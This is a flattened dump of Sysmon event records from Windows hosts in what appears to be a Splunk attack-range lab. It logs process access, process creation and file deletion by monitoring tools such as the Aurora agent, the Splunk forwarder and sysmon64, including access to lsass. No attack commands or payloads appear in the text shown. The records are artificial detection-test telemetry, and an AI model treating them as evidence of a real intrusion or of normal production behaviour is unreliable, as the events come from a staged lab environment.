Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.731{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.335{FE4C2B44-E5EF-63C7-7B06-00000000AF02}15123208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000045942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.319{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C0262430D1F979551E7E2AD9FFCA5F4,SHA256=C826D18EE8F51379A8F1F60EA9DB637BEE4BE1FFE38D28902992990078A80860,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.178{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5EF-63C7-7B06-00000000AF02}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.178{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.178{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.178{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.178{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.178{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E5EF-63C7-7B06-00000000AF02}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.178{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5EF-63C7-7B06-00000000AF02}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:31.179{FE4C2B44-E5EF-63C7-7B06-00000000AF02}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018315Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.523{E5A8D418-E5F0-63C7-3202-00000000B002}16921496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018314Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C3FE1D79ABB5A0E623A9A489702D52C,SHA256=4CC5938C82906D9C91BE12CB0C6063858C484FADDBD5A9575D227FB3F41BA0D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018313Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5F0-63C7-3202-00000000B002}1692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018312Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018311Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018310Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018309Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018308Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018307Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018306Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018305Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018304Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018303Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E5F0-63C7-3202-00000000B002}1692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018302Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.351{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5F0-63C7-3202-00000000B002}1692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018301Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.352{E5A8D418-E5F0-63C7-3202-00000000B002}1692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program 